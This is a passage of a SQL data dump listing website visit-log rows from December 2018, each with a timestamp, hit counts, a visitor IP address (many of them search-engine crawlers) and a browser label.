er'),(355654,1545268043,1,1,0,0,'66.249.66.156','chrome'),(355655,1545268044,1,1,0,0,'66.249.66.154','chrome'),(355656,1545268477,1,1,0,0,'95.163.255.95','other'),(355657,1545268481,1,1,0,0,'95.163.255.97','other'),(355658,1545268902,3,3,0,0,'40.77.167.32','other'),(355659,1545269299,3,3,0,0,'216.244.66.241','other'),(355660,1545269461,1,1,0,0,'193.34.95.42','firefox'),(355662,1545270065,1,1,0,0,'40.77.167.137','other'),(355663,1545270082,1,1,0,0,'87.250.224.64','other'),(355664,1545270904,1,1,0,0,'87.250.224.47','other'),(355665,1545271334,1,1,0,0,'178.154.244.11','other'),(355666,1545271373,1,1,0,0,'216.244.66.241','other'),(355667,1545271907,1,1,0,0,'8.29.198.25','other'),(355668,1545271924,3,3,0,0,'157.55.39.84','other'),(355669,1545271986,2,2,0,0,'141.8.142.103','other'),(355670,1545272006,3,3,0,0,'193.34.95.42','firefox'),(355671,1545272184,1,1,0,0,'8.29.198.27','other'),(355672,1545272585,2,2,0,0,'216.244.66.241','other'),(355673,1545273093,1,1,0,0,'46.229.168.138','other'),(355674,1545273614,1,1,0,0,'46.229.168.132','other'),(355675,1545273920,1,1,0,0,'141.8.142.103','other'),(355676,1545274034,1,1,0,0,'40.77.167.137','other'),(355677,1545274163,1,1,0,0,'46.229.168.143','other'),(355678,1545274202,1,1,0,0,'213.180.203.40','other'),(355679,1545274394,2,2,0,0,'157.55.39.136','other'),(355680,1545274815,1,1,0,0,'46.229.168.133','other'),(355681,1545274920,1,1,0,0,'95.163.255.185','other'),(355682,1545274922,1,1,0,0,'95.163.255.155','other'),(355683,1545275091,2,2,0,0,'35.160.66.50','chrome'),(355684,1545275237,1,1,0,0,'5.45.207.19','other'),(355685,1545275314,2,2,0,0,'178.154.244.11','other'),(355686,1545275360,1,1,0,0,'37.9.113.20','other'),(355687,1545275390,1,1,0,0,'213.180.203.9','other'),(355688,1545275403,1,1,0,0,'95.108.181.57','other'),(355689,1545275468,1,1,0,0,'95.108.213.4','other'),(355690,1545275510,1,1,0,0,'178.154.244.21','other'),(355691,1545275787,1,1,0,0,'216.244.66.241','other'),(355692,1545275847,1,1,0,0,'141.8.142.81','other'),(355694,1545276071,1,1,0,0,'157.55.39.84','other'),(355695,1545276129,1,1,0,0,'193.34.95.42','firefox'),(355696,1545276971,1,1,0,0,'40.77.167.137','other'),(355697,1545277007,1,1,0,0,'46.229.168.137','other'),(355698,1545277313,1,1,0,0,'141.8.142.103','other'),(355699,1545277728,1,1,0,0,'5.45.207.19','other'),(355700,1545277905,1,1,0,0,'95.163.255.98','other'),(355701,1545277908,1,1,0,0,'95.163.255.95','other'),(355702,1545278115,1,1,0,0,'157.55.39.84','other'),(355703,1545278250,3,3,0,0,'216.244.66.241','other'),(355704,1545278881,1,1,0,0,'46.229.168.136','other'),(355705,1545279663,2,2,0,0,'46.229.168.129','other'),(355706,1545279734,1,1,0,0,'180.76.15.140','other'),(355707,1545279736,1,1,0,0,'180.76.15.139','other'),(355708,1545280815,3,3,0,0,'216.244.66.241','other'),(355709,1545280893,1,1,0,0,'46.229.168.135','other'),(355710,1545281582,1,1,0,0,'157.55.39.136','other'),(355711,1545281654,1,1,0,0,'46.229.168.145','other'),(355712,1545281967,2,2,0,0,'216.244.66.241','other'),(355713,1545282033,1,1,0,0,'95.163.255.105','other'),(355714,1545282218,1,1,0,0,'95.163.255.115','other'),(355715,1545282529,1,1,0,0,'40.77.167.32','other'),(355716,1545282537,1,1,0,0,'66.249.66.156','chrome'),(355718,1545282743,1,1,0,0,'8.29.198.27','other'),(355719,1545283014,1,1,0,0,'8.29.198.26','other'),(355720,1545283024,1,1,0,0,'157.55.39.84','other'),(355721,1545283185,1,1,0,0,'46.229.168.144','other'),(355722,1545283207,1,1,0,0,'66.249.66.152','chrome'),(355723,1545283650,1,1,0,0,'40.77.167.32','other'),(355724,1545283956,1,1,0,0,'157.55.39.84','other'),(355725,1545284074,1,1,0,0,'5.45.207.79','other'),(355726,1545284079,1,1,0,0,'95.108.213.4','other'),(355727,1545284412,7,7,0,0,'216.244.66.241','other'),(355728,1545284593,1,1,0,0,'46.211.67.135','chrome'),(355729,1545284658,1,1,0,0,'195.128.17.206','other'),(355730,1545284991,1,1,0,0,'46.229.168.129','other'),(355731,1545285039,1,1,0,0,'66.249.66.156','chrome'),(355732,1545285040,1,1,0,0,'66.249.66.154','chrome'),(355733,1545285106,2,2,0,0,'40.77.167.137','other'),(355734,1545285304,1,1,0,0,'207.46.13.238','other'),(355735,1545285365,1,1,0,0,'46.229.168.152','other'),(355736,1545285870,1,1,0,0,'181.215.78.191','chrome'),(355737,1545285873,1,1,0,0,'178.171.108.142','chrome'),(355738,1545286312,1,1,0,0,'46.229.168.145','other'),(355739,1545286688,1,1,0,0,'95.163.255.157','other'),(355740,1545286816,1,1,0,0,'46.229.168.133','other'),(355741,1545286882,3,3,0,0,'216.244.66.241','other'),(355742,1545286998,2,2,0,0,'91.209.11.236','other'),(355743,1545287254,4,4,0,0,'5.45.207.19','other'),(355744,1545287305,3,3,0,0,'91.196.178.67','chrome'),(355745,1545287308,2,2,0,0,'95.108.213.4','other'),(355746,1545287384,1,1,0,0,'87.250.224.47','other'),(355747,1545287504,2,2,0,0,'5.45.207.79','other'),(355748,1545287701,2,2,0,0,'141.8.142.103','other'),(355749,1545287733,1,1,0,0,'46.229.168.130','other'),(355750,1545287888,11,11,0,0,'178.154.244.11','other'),(355751,1545288096,2,2,0,0,'91.196.177.46','chrome'),(355752,1545288306,2,2,0,0,'87.250.224.47','other'),(355753,1545288414,3,3,0,0,'91.196.178.67','chrome'),(355754,1545288438,3,3,0,0,'5.45.207.19','other'),(355755,1545288494,5,5,0,0,'5.45.207.79','other'),(355756,1545288562,1,1,0,0,'54.36.148.145','other'),(355757,1545288791,1,1,0,0,'216.244.66.241','other'),(355758,1545288860,3,3,0,0,'95.108.213.4','other'),(355759,1545288888,1,1,0,0,'54.36.149.65','other'),(355760,1545288889,1,1,0,0,'66.249.66.156','chrome'),(355761,1545289064,2,2,0,0,'178.154.244.11','other'),(355762,1545289166,2,2,0,0,'141.8.142.103','other'),(355763,1545289567,3,3,0,0,'5.45.207.19','other'),(355764,1545289651,2,2,0,0,'5.45.207.79','other'),(355765,1545289934,1,1,0,0,'162.254.207.44','chrome'),(355766,1545289979,1,1,0,0,'46.229.168.151','other'),(355767,1545289981,1,1,0,0,'46.229.168.135','other'),(355768,1545290347,1,1,0,0,'66.249.66.154','chrome'),(355769,1545290397,2,2,0,0,'91.124.182.170','firefox'),(355770,1545290455,1,1,0,0,'46.229.168.150','other'),(355771,1545290575,1,1,0,0,'54.36.148.235','other'),(355772,1545290991,1,1,0,0,'54.36.148.169','other'),(355773,1545291096,1,1,0,0,'157.55.39.84','other'),(355774,1545291483,2,2,0,0,'216.244.66.241','other'),(355775,1545291690,2,2,0,0,'91.196.178.67','chrome'),(355776,1545292115,1,1,0,0,'5.45.207.79','other'),(355777,1545292476,1,1,0,0,'54.36.148.40','other'),(355778,1545292561,2,2,0,0,'40.77.167.32','other'),(355779,1545292931,1,1,0,0,'46.229.168.149','other'),(355780,1545293158,1,1,0,0,'95.163.255.190','other'),(355781,1545293161,1,1,0,0,'95.163.255.182','other'),(355782,1545293217,1,1,0,0,'216.244.66.241','other'),(355783,1545293567,2,2,0,0,'8.29.198.25','other'),(355784,1545293655,1,1,0,0,'95.163.255.96','other'),(355785,1545293661,1,1,0,0,'95.163.255.94','other'),(355786,1545293688,1,1,0,0,'37.9.113.148','other'),(355787,1545293702,1,1,0,0,'46.211.120.200','chrome'),(355788,1545293710,1,1,0,0,'40.77.167.162','other'),(355789,1545294324,2,2,0,0,'91.196.178.84','firefox'),(355790,1545294419,1,1,0,0,'216.244.66.241','other'),(355791,1545294525,1,1,0,0,'54.36.149.11','other'),(355792,1545294531,8,8,0,0,'5.9.152.73','other'),(355793,1545294551,1,1,0,0,'54.36.148.180','other'),(355794,1545294567,2,2,0,0,'157.55.39.54','other'),(355795,1545294569,1,1,0,0,'54.36.148.201','other'),(355796,1545295121,1,1,0,0,'40.77.167.41','other'),(355797,1545295150,1,1,0,0,'54.36.148.107','other'),(355798,1545295236,1,1,0,0,'54.36.149.86','other'),(355799,1545295919,2,2,0,0,'91.196.178.67','chrome'),(355800,1545295991,1,1,0,0,'37.57.53.172','chrome'),(355801,1545296237,1,1,0,0,'91.225.175.54','chrome'),(355802,1545296263,1,1,0,0,'54.36.149.47','other'),(355803,1545296686,1,1,0,0,'46.229.168.138','other'),(355804,1545297174,1,1,0,0,'54.36.148.185','other'),(355805,1545297432,1,1,0,0,'54.36.148.51','other'),(355806,1545297472,1,1,0,0,'5.45.207.19','other'),(355807,1545297774,1,1,0,0,'54.36.149.76','other'),(355808,1545297916,1,1,0,0,'46.229.168.129','other'),(355809,1545297917,1,1,0,0,'46.229.168.146','other'),(355810,1545297946,2,2,0,0,'91.196.177.46','chrome'),(355811,1545298063,1,1,0,0,'66.249.66.152','chrome'),(355812,1545298093,1,1,0,0,'54.36.148.30','other'),(355813,1545298108,1,1,0,0,'216.244.66.241','other'),(355814,1545298812,1,1,0,0,'54.36.148.228','other'),(355815,1545299367,3,3,0,0,'216.244.66.241','other'),(355816,1545299420,2,2,0,0,'141.8.142.108','other'),(355817,1545299442,3,3,0,0,'5.45.207.79','other'),(355818,1545299504,4,4,0,0,'178.154.244.11','other'),(355819,1545299592,3,3,0,0,'141.8.142.103','other'),(355820,1545299717,4,4,0,0,'5.45.207.19','other'),(355821,1545300046,2,2,0,0,'37.9.113.20','other'),(355822,1545300049,1,1,0,0,'87.250.224.47','other'),(355823,1545300272,1,1,0,0,'37.9.113.148','other'),(355824,1545300356,2,2,0,0,'91.196.178.67','chrome'),(355825,1545300458,2,2,0,0,'95.108.213.4','other'),(355826,1545300460,9,9,0,0,'178.154.244.11','other'),(355827,1545300613,2,2,0,0,'5.45.207.79','other'),(355828,1545300645,1,1,0,0,'46.229.168.130','other'),(355829,1545300648,6,6,0,0,'5.45.207.19','other'),(355830,1545300841,1,1,0,0,'77.52.210.49','chrome'),(355831,1545301127,2,2,0,0,'87.250.224.47','other'),(355832,1545301143,1,1,0,0,'46.229.168.133','other'),(355833,1545301145,1,1,0,0,'46.229.168.136','other'),(355834,1545301153,1,1,0,0,'46.229.168.149','other'),(355835,1545301224,1,1,0,0,'141.8.142.103','other'),(355836,1545301258,1,1,0,0,'157.55.39.220','other'),(355837,1545301271,1,1,0,0,'91.196.178.168','other'),(355838,1545301337,9,9,0,0,'136.243.37.219','other'),(355839,1545301859,1,1,0,0,'54.36.148.158','other'),(355840,1545302042,1,1,0,0,'54.36.149.71','other'),(355841,1545302214,1,0,1,0,'66.249.66.157',''),(355842,1545302215,1,0,1,0,'66.249.66.156',''),(355843,1545302259,2,2,0,0,'176.98.69.7','chrome'),(355844,1545302432,1,1,0,0,'54.36.148.89','other'),(355845,1545302663,1,1,0,0,'46.229.168.133','other'),(355846,1545302764,1,1,0,0,'54.36.148.96','other'),(355847,1545302881,1,1,0,0,'54.36.148.124','other'),(355848,1545303022,2,2,0,0,'216.244.66.241','other'),(355849,1545303115,1,1,0,0,'54.36.148.117','other'),(355850,1545303230,1,1,0,0,'46.229.168.136','other'),(355851,1545303232,1,1,0,0,'46.229.168.153','other'),(355852,1545303313,3,3,0,0,'176.106.5.30','chrome'),(355853,1545303363,1,1,0,0,'54.36.149.31','other'),(355854,1545303738,1,1,0,0,'66.249.66.152','chrome'),(355855,1545303939,2,2,0,0,'162.210.196.130','other'),(355856,1545304285,1,1,0,0,'95.163.255.173','other'),(355857,1545304288,1,1,0,0,'95.163.255.161','other'),(355858,1545304301,1,1,0,0,'40.77.167.162','other'),(355859,1545304310,2,2,0,0,'94.179.246.96','firefox'),(355860,1545304395,2,2,0,0,'8.29.198.25','other'),(355861,1545304403,1,1,0,0,'180.76.15.137','other'),(355862,1545304404,1,1,0,0,'180.76.15.138','other'),(355863,1545304482,1,1,0,0,'193.104.213.101','opera'),(355864,1545304491,1,1,0,0,'54.36.149.27','other'),(355865,1545304723,1,1,0,0,'95.163.255.92','other'),(355866,1545305308,1,1,0,0,'46.229.168.130','other'),(355867,1545305344,1,1,0,0,'46.133.7.30','firefox'),(355868,1545305555,1,1,0,0,'46.229.168.147','other'),(355869,1545305557,1,1,0,0,'46.229.168.154','other'),(355870,1545305949,1,1,0,0,'54.36.148.76','other'),(355871,1545306011,1,1,0,0,'216.244.66.241','other'),(355872,1545306085,1,1,0,0,'54.36.148.211','other'),(355873,1545306194,2,2,0,0,'91.196.178.129','firefox'),(355874,1545306240,1,1,0,0,'46.229.168.133','other'),(355875,1545306403,1,1,0,0,'180.76.15.163','other'),(355876,1545306457,2,2,0,0,'91.196.178.87','firefox'),(355877,1545306507,1,1,0,0,'180.76.15.158','other'),(355878,1545306508,1,1,0,0,'180.76.15.19','other'),(355879,1545306703,2,2,0,0,'157.55.39.84','other'),(355880,1545306963,1,1,0,0,'46.229.168.139','other'),(355881,1545307304,1,1,0,0,'46.229.168.144','other'),(355882,1545307527,1,1,0,0,'80.252.153.33','chrome'),(355883,1545307571,1,1,0,0,'216.244.66.241','other'),(355884,1545308174,2,2,0,0,'207.46.13.35','other'),(355885,1545308235,4,4,0,0,'130.180.210.24','chrome'),(355886,1545308877,2,2,0,0,'216.244.66.241','other'),(355887,1545308956,1,1,0,0,'37.53.213.144','chrome'),(355888,1545309112,1,1,0,0,'95.163.255.180','other'),(355889,1545309114,1,1,0,0,'95.163.255.181','other'),(355890,1545309304,1,1,0,0,'46.229.168.129','other'),(355891,1545309523,1,1,0,0,'40.77.167.162','other'),(355892,1545309923,1,1,0,0,'157.55.39.54','other'),(355893,1545310020,3,3,0,0,'216.244.66.241','other'),(355894,1545310276,5,5,0,0,'37.53.123.205','chrome'),(355895,1545310515,1,1,0,0,'46.229.168.146','other'),(355896,1545310516,1,1,0,0,'46.229.168.134','other'),(355897,1545310614,2,2,0,0,'207.46.13.35','other'),(355898,1545310731,1,1,0,0,'54.36.148.229','other'),(355899,1545311271,1,1,0,0,'54.36.149.31','other'),(355900,1545311552,1,1,0,0,'46.229.168.142','other'),(355901,1545311784,3,3,0,0,'216.244.66.241','other'),(355902,1545311817,1,1,0,0,'46.229.168.139','other'),(355903,1545311845,1,1,0,0,'178.154.244.11','other'),(355904,1545311977,3,3,0,0,'5.45.207.79','other'),(355905,1545312244,2,2,0,0,'91.196.178.67','chrome'),(355906,1545312925,1,1,0,0,'37.187.134.60','other'),(355907,1545312950,1,1,0,0,'188.165.255.126','other'),(355908,1545313056,1,1,0,0,'37.53.213.144','chrome'),(355909,1545313085,1,1,0,0,'95.163.255.173','other'),(355910,1545313088,1,1,0,0,'95.163.255.163','other'),(355911,1545313252,1,1,0,0,'54.36.148.183','other'),(355912,1545313268,1,1,0,0,'54.36.178.138','other'),(355913,1545313306,1,1,0,0,'157.55.39.84','other'),(355914,1545313336,1,1,0,0,'216.244.66.241','other'),(355915,1545313380,1,1,0,0,'54.36.148.53','other'),(355916,1545313689,3,3,0,0,'37.55.27.164','chrome'),(355917,1545313929,1,1,0,0,'46.200.208.165','firefox'),(355918,1545314720,2,2,0,0,'207.46.13.51','other'),(355919,1545315001,1,1,0,0,'5.58.53.78','opera'),(355920,1545315014,2,2,0,0,'216.244.66.241','other'),(355921,1545315118,1,1,0,0,'95.163.255.193','other'),(355922,1545315121,1,1,0,0,'95.163.255.161','other'),(355923,1545315142,2,2,0,0,'207.46.13.52','other'),(355924,1545315228,1,1,0,0,'8.29.198.27','other'),(355925,1545315519,1,1,0,0,'8.29.198.26','other'),(355926,1545315609,3,3,0,0,'94.100.221.234','chrome'),(355927,1545315669,1,1,0,0,'54.36.148.129','other'),(355928,1545315697,1,1,0,0,'37.73.187.7','chrome'),(355929,1545315960,2,2,0,0,'216.244.66.241','other'),(355930,1545316186,1,1,0,0,'178.95.246.220','chrome'),(355931,1545316234,2,2,0,0,'207.46.13.52','other'),(355932,1545316738,1,1,0,0,'95.163.255.175','other'),(355933,1545316741,1,1,0,0,'95.163.255.170','other'),(355934,1545317107,3,3,0,0,'195.10.210.70','chrome'),(355935,1545317128,1,1,0,0,'54.36.149.37','other'),(355936,1545317218,2,2,0,0,'5.58.53.78','other'),(355937,1545317275,2,2,0,0,'40.77.167.162','other'),(355938,1545317470,1,1,0,0,'54.36.148.100','other'),(355939,1545317499,1,1,0,0,'54.36.148.106','other'),(355940,1545317553,3,3,0,0,'207.46.13.52','other'),(355941,1545317988,2,2,0,0,'216.244.66.241','other'),(355942,1545318086,1,1,0,0,'66.249.66.155','chrome'),(355943,1545318089,1,1,0,0,'66.249.66.152','chrome'),(355944,1545318282,1,1,0,0,'95.163.255.168','other'),(355945,1545318285,1,1,0,0,'95.163.255.154','other'),(355946,1545318526,2,2,0,0,'78.111.185.226','chrome'),(355947,1545318793,5,5,0,0,'40.77.167.162','other'),(355948,1545318806,3,3,0,0,'207.46.13.53','other'),(355949,1545318811,1,1,0,0,'54.36.148.178','other'),(355950,1545318845,1,1,0,0,'5.58.53.78','opera'),(355951,1545318953,2,2,0,0,'216.244.66.241','other'),(355952,1545319078,1,1,0,0,'54.36.148.88','other'),(355953,1545319260,2,2,0,0,'141.8.142.103','other'),(355954,1545319690,1,1,0,0,'5.58.40.100','opera'),(355955,1545319766,2,2,0,0,'40.77.167.162','other'),(355956,1545319836,1,1,0,0,'178.154.244.11','other'),(355957,1545320268,3,3,0,0,'40.77.167.20','other'),(355958,1545320393,1,1,0,0,'54.36.148.64','other'),(355959,1545320712,1,1,0,0,'66.249.66.152','chrome'),(355960,1545320814,1,1,0,0,'194.44.62.46','chrome'),(355961,1545320907,1,1,0,0,'54.36.148.245','other'),(355962,1545320945,1,1,0,0,'54.36.148.232','other'),(355963,1545320976,1,1,0,0,'54.36.148.231','other'),(355964,1545321042,4,4,0,0,'40.77.167.21','other'),(355965,1545321248,2,2,0,0,'40.77.167.162','other'),(355966,1545321304,5,5,0,0,'40.77.167.20','other'),(355967,1545321710,1,1,0,0,'178.92.220.139','chrome'),(355968,1545321719,4,4,0,0,'40.77.167.19','other'),(355969,1545321731,1,1,0,0,'195.10.210.49','chrome'),(355970,1545321935,2,2,0,0,'216.244.66.241','other'),(355971,1545321938,1,1,0,0,'54.36.148.82','other'),(355972,1545322084,1,1,0,0,'18.184.52.215','other'),(355973,1545322140,4,4,0,0,'40.77.167.21','other'),(355974,1545322200,4,4,0,0,'40.77.167.162','other'),(355975,1545322285,1,1,0,0,'54.36.149.105','other'),(355976,1545322597,1,1,0,0,'5.45.207.19','other'),(355977,1545322968,1,1,0,0,'66.249.66.42','chrome'),(355978,1545323085,1,1,0,0,'216.244.66.241','other'),(355979,1545323193,5,5,0,0,'40.77.167.149','other'),(355980,1545323198,1,1,0,0,'46.229.168.153','other'),(355981,1545323199,1,1,0,0,'46.229.168.134','other'),(355982,1545323629,2,2,0,0,'91.196.178.135','firefox'),(355983,1545323738,1,1,0,0,'54.36.149.25','other'),(355984,1545323921,3,3,0,0,'95.108.213.4','other'),(355985,1545323931,2,2,0,0,'5.45.207.19','other'),(355986,1545323956,4,4,0,0,'141.8.142.103','other'),(355987,1545324171,2,2,0,0,'216.244.66.241','other'),(355988,1545324184,1,1,0,0,'178.154.244.11','other'),(355989,1545324287,6,6,0,0,'5.45.207.79','other'),(355990,1545324293,2,2,0,0,'40.77.167.20','other'),(355991,1545324394,8,8,0,0,'40.77.167.149','other'),(355992,1545324461,2,2,0,0,'87.250.224.47','other'),(355993,1545324516,1,1,0,0,'54.36.148.174','other'),(355994,1545324613,1,1,0,0,'66.249.66.57','chrome'),(355995,1545324614,1,1,0,0,'66.249.66.42','chrome'),(355996,1545324646,1,1,0,0,'46.229.168.153','other'),(355997,1545324648,1,1,0,0,'46.229.168.140','other'),(355998,1545325006,1,1,0,0,'141.8.142.103','other'),(355999,1545325008,4,4,0,0,'5.45.207.19','other'),(356000,1545325285,5,5,0,0,'40.77.167.20','other'),(356001,1545325330,4,4,0,0,'178.154.244.11','other'),(356002,1545325612,1,1,0,0,'54.36.149.93','other'),(356003,1545325615,2,2,0,0,'95.108.213.4','other'),(356004,1545325619,2,2,0,0,'5.45.207.79','other'),(356005,1545325820,1,1,0,0,'95.163.255.176','other'),(356006,1545325821,1,1,0,0,'95.163.255.180','other'),(356007,1545325824,1,1,0,0,'95.163.255.193','other'),(356008,1545325827,1,1,0,0,'95.163.255.189','other'),(356009,1545325871,1,1,0,0,'37.9.113.148','other'),(356010,1545326058,1,1,0,0,'8.29.198.27','other'),(356011,1545326233,2,2,0,0,'40.77.167.41','other'),(356012,1545326293,2,2,0,0,'178.154.244.11','other'),(356013,1545326335,1,1,0,0,'176.37.133.114','other'),(356014,1545326406,1,1,0,0,'8.29.198.26','other'),(356015,1545326455,1,1,0,0,'95.163.255.182','other'),(356016,1545326457,1,1,0,0,'95.163.255.171','other'),(356017,1545326531,3,3,0,0,'66.249.66.154','chrome'),(356018,1545326535,2,2,0,0,'95.163.255.167','other'),(356019,1545326574,1,1,0,0,'195.34.204.156','chrome'),(356020,1545326725,1,1,0,0,'95.163.255.191','other'),(356021,1545326727,1,1,0,0,'95.163.255.172','other'),(356022,1545326798,2,2,0,0,'40.77.167.21','other'),(356023,1545326870,1,1,0,0,'95.163.255.95','other'),(356024,1545326873,2,2,0,0,'95.163.255.93','other'),(356025,1545327064,1,1,0,0,'66.249.66.156','chrome'),(356026,1545327337,2,2,0,0,'46.211.112.108','chrome'),(356027,1545327565,1,1,0,0,'66.249.66.154','chrome'),(356028,1545327735,4,4,0,0,'157.55.39.98','other'),(356029,1545327754,1,1,0,0,'95.163.255.98','other'),(356030,1545327811,2,2,0,0,'91.196.178.81','firefox'),(356031,1545327824,2,2,0,0,'207.46.13.149','other'),(356032,1545327878,1,1,0,0,'40.77.167.21','other'),(356033,1545328003,2,2,0,0,'93.73.173.105','chrome'),(356034,1545328367,4,4,0,0,'40.77.167.149','other'),(356035,1545328505,1,1,0,0,'5.58.85.11','msie'),(356036,1545328545,2,2,0,0,'207.46.13.91','other'),(356037,1545328684,1,1,0,0,'46.229.168.140','other'),(356038,1545328824,2,2,0,0,'216.244.66.241','other'),(356039,1545328959,1,1,0,0,'95.163.255.191','other'),(356040,1545328961,1,1,0,0,'95.163.255.151','other'),(356041,1545329053,2,2,0,0,'40.77.167.20','other'),(356042,1545329933,3,3,0,0,'157.55.39.98','other'),(356043,1545329942,2,2,0,0,'40.77.167.149','other'),(356044,1545330153,1,1,0,0,'13.66.139.0','other'),(356045,1545330905,1,1,0,0,'46.229.168.150','other'),(356046,1545330907,1,1,0,0,'46.229.168.151','other'),(356047,1545331000,1,1,0,0,'66.249.66.157','chrome'),(356048,1545331103,2,2,0,0,'91.124.183.193','chrome'),(356049,1545331105,2,2,0,0,'40.77.167.20','other'),(356050,1545331354,3,3,0,0,'40.77.167.21','other'),(356051,1545331513,2,2,0,0,'157.55.39.98','other'),(356052,1545331601,1,1,0,0,'95.163.255.161','other'),(356053,1545331603,1,1,0,0,'95.163.255.183','other'),(356054,1545331632,1,1,0,0,'66.249.66.154','chrome'),(356055,1545331769,1,1,0,0,'216.244.66.241','other'),(356056,1545331920,1,1,0,0,'46.229.168.130','other'),(356057,1545332223,4,4,0,0,'40.77.167.102','other'),(356058,1545332306,2,2,0,0,'46.211.119.248','chrome'),(356059,1545332537,1,1,0,0,'40.77.167.149','other'),(356060,1545332681,1,1,0,0,'5.45.207.79','other'),(356061,1545332829,1,1,0,0,'180.76.15.139','other'),(356062,1545333049,2,2,0,0,'157.55.39.98','other'),(356063,1545333212,2,2,0,0,'40.77.167.20','other'),(356064,1545333229,3,3,0,0,'40.77.167.102','other'),(356065,1545333431,1,1,0,0,'46.211.119.248','chrome'),(356066,1545333758,6,6,0,0,'40.77.167.21','other'),(356067,1545334211,2,2,0,0,'157.55.39.98','other'),(356068,1545334453,1,1,0,0,'46.211.119.248','chrome'),(356069,1545334503,1,1,0,0,'40.77.167.20','other'),(356070,1545334568,1,1,0,0,'188.163.8.205','other'),(356071,1545334586,2,2,0,0,'95.46.161.249','chrome'),(356072,1545334763,3,3,0,0,'216.244.66.241','other'),(356073,1545334978,1,1,0,0,'95.163.255.93','other'),(356074,1545334981,1,1,0,0,'95.163.255.96','other'),(356075,1545335071,2,2,0,0,'5.45.207.19','other'),(356076,1545335106,1,1,0,0,'87.250.224.65','other'),(356077,1545335228,2,2,0,0,'141.8.142.103','other'),(356078,1545335238,4,4,0,0,'5.45.207.79','other'),(356079,1545335421,6,6,0,0,'40.77.167.102','other'),(356080,1545335422,5,5,0,0,'178.154.244.11','other'),(356081,1545335429,2,2,0,0,'40.77.167.21','other'),(356082,1545335549,6,6,0,0,'40.77.167.20','other'),(356083,1545335625,4,4,0,0,'157.55.39.98','other'),(356084,1545335761,3,3,0,0,'82.145.208.231','other'),(356085,1545336057,1,1,0,0,'95.163.255.112','other'),(356086,1545336076,1,1,0,0,'95.163.255.107','other'),(356087,1545336169,3,3,0,0,'141.8.142.103','other'),(356088,1545336355,3,3,0,0,'178.154.244.11','other'),(356089,1545336548,1,1,0,0,'95.163.255.63','other'),(356090,1545336551,1,1,0,0,'95.163.255.69','other'),(356091,1545336564,2,2,0,0,'46.211.119.248','chrome'),(356092,1545336716,2,2,0,0,'40.77.167.21','other'),(356093,1545336735,7,7,0,0,'40.77.167.20','other'),(356094,1545336825,1,1,0,0,'5.188.210.53','chrome'),(356095,1545336887,1,1,0,0,'8.29.198.26','other'),(356096,1545337106,3,3,0,0,'40.77.167.102','other'),(356097,1545337134,2,2,0,0,'5.45.207.79','other'),(356098,1545337250,1,1,0,0,'8.29.198.27','other'),(356099,1545337422,3,3,0,0,'216.244.66.241','other'),(356100,1545337545,1,1,0,0,'5.45.207.19','other'),(356101,1545337583,2,2,0,0,'178.154.244.11','other'),(356102,1545337657,2,2,0,0,'167.114.116.24','chrome'),(356103,1545337802,2,2,0,0,'40.77.167.21','other'),(356104,1545338462,1,1,0,0,'216.244.66.241','other'),(356105,1545338707,1,1,0,0,'66.249.66.152','chrome'),(356106,1545338875,1,1,0,0,'46.229.168.135','other'),(356107,1545339390,1,1,0,0,'40.77.167.20','other'),(356108,1545339498,1,1,0,0,'93.73.95.230','chrome'),(356109,1545339510,1,1,0,0,'109.162.72.129','chrome'),(356110,1545339554,2,2,0,0,'40.77.167.21','other'),(356111,1545339567,1,1,0,0,'95.163.255.106','other'),(356112,1545339638,1,1,0,0,'95.163.255.114','other'),(356113,1545339680,2,2,0,0,'40.77.167.102','other'),(356114,1545339808,1,1,0,0,'95.46.161.249','chrome'),(356115,1545339953,2,2,0,0,'207.46.13.167','other'),(356116,1545340046,2,2,0,0,'46.229.168.154','other'),(356117,1545340239,3,3,0,0,'216.244.66.241','other'),(356118,1545340285,2,2,0,0,'66.249.66.155','chrome'),(356119,1545340291,1,1,0,0,'66.249.66.154','chrome'),(356120,1545340528,2,2,0,0,'66.249.66.156','chrome'),(356121,1545340559,1,1,0,0,'157.55.39.98','other'),(356122,1545340590,6,6,0,0,'40.77.167.20','other'),(356123,1545340759,1,1,0,0,'46.229.168.152','other'),(356124,1545340761,1,1,0,0,'46.229.168.130','other'),(356125,1545340911,3,3,0,0,'207.46.13.167','other'),(356126,1545341360,4,4,0,0,'40.77.167.102','other'),(356127,1545341394,1,1,0,0,'46.229.168.143','other'),(356128,1545341561,12,12,0,0,'91.242.162.44','other'),(356129,1545341570,1,1,0,0,'46.229.168.149','other'),(356130,1545341822,3,3,0,0,'207.46.13.167','other'),(356131,1545342109,1,1,0,0,'176.8.210.146','firefox'),(356132,1545342140,6,6,0,0,'136.243.70.151','other'),(356133,1545342319,1,1,0,0,'37.9.113.148','other'),(356134,1545342485,4,4,0,0,'40.77.167.102','other'),(356135,1545342490,1,1,0,0,'95.163.255.174','other'),(356136,1545342492,1,1,0,0,'95.163.255.188','other'),(356137,1545342583,2,2,0,0,'157.55.39.98','other'),(356138,1545342738,1,1,0,0,'66.249.66.57','chrome'),(356139,1545342739,1,1,0,0,'66.249.66.44','chrome'),(356140,1545343039,1,1,0,0,'46.229.168.154','other'),(356141,1545343064,8,8,0,0,'91.242.162.44','other'),(356142,1545343282,1,1,0,0,'5.58.40.100','firefox'),(356143,1545343297,1,1,0,0,'216.244.66.241','other'),(356144,1545343315,1,1,0,0,'95.163.255.167','other'),(356145,1545343317,1,1,0,0,'95.163.255.152','other'),(356146,1545343345,1,1,0,0,'95.163.255.182','other'),(356147,1545343668,1,1,0,0,'46.229.168.129','other'),(356148,1545344043,1,1,0,0,'5.188.210.53','chrome'),(356149,1545344085,4,4,0,0,'91.242.162.44','other'),(356150,1545344096,2,2,0,0,'40.77.167.63','other'),(356151,1545344207,2,2,0,0,'207.46.13.167','other'),(356152,1545344605,1,1,0,0,'95.163.255.154','other'),(356153,1545344608,1,1,0,0,'95.163.255.192','other'),(356154,1545345061,4,4,0,0,'91.242.162.44','other'),(356155,1545345175,4,4,0,0,'40.77.167.63','other'),(356156,1545345563,7,7,0,0,'40.77.167.162','other'),(356157,1545345625,1,1,0,0,'46.229.168.130','other'),(356158,1545345627,1,1,0,0,'46.229.168.133','other'),(356159,1545346094,6,6,0,0,'91.242.162.44','other'),(356160,1545346400,5,5,0,0,'40.77.167.63','other'),(356161,1545346418,1,1,0,0,'5.45.207.79','other'),(356162,1545346641,1,1,0,0,'207.46.13.167','other'),(356163,1545346932,1,1,0,0,'178.154.244.11','other'),(356164,1545347291,2,2,0,0,'40.77.167.162','other'),(356165,1545347594,2,2,0,0,'157.55.39.98','other'),(356166,1545347618,3,3,0,0,'216.244.66.241','other'),(356167,1545347663,2,2,0,0,'5.45.207.79',